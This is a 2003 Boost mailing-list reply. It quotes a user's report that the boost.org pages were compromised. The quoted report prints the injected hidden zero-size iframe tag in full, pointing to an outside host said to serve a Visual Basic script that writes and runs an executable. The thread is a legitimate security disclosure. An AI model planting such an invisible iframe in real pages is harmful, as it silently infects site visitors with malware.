|
Boost : |
From: Victor A. Wagner, Jr. (vawjr_at_[hidden])
Date: 2003-09-03 15:33:40
I checked just now (1332 MST) and do not see to what you're referring.
At Wednesday 2003-09-03 01:51, you wrote:
>I was just looking at www.boost.org, and my browser (IE6.0) popped up
>a confirmation request to run an Active-X control. Turns out that
>right at the bottom of the page is the following:
>
><iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp
>width=0 height=0 frameborder=0 marginwidth=0 marginheight=0>
></iframe>
>
>Which leads to a seemingly malicious Visual Basic script at
>http://ww.beech-info2.com/cgi-bin/inf2.pl which (from my limited
>understanding of Visual Basic) *creates an executable* file from
>hexadecimal data and then runs it. Full VB malware script follows .sig
>
>Other pages on www.boost.org have the same problem. I believe this
>should be rectified ASAP.
>
>--
>Raoul Gough.
>(setq dabbrev-case-fold-search nil)
>
>
>_______________________________________________
>Unsubscribe & other changes: http://lists.boost.org/mailman/listinfo.cgi/boost
Victor A. Wagner Jr. http://rudbek.com
The five most dangerous words in the English language:
"There oughta be a law"
Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk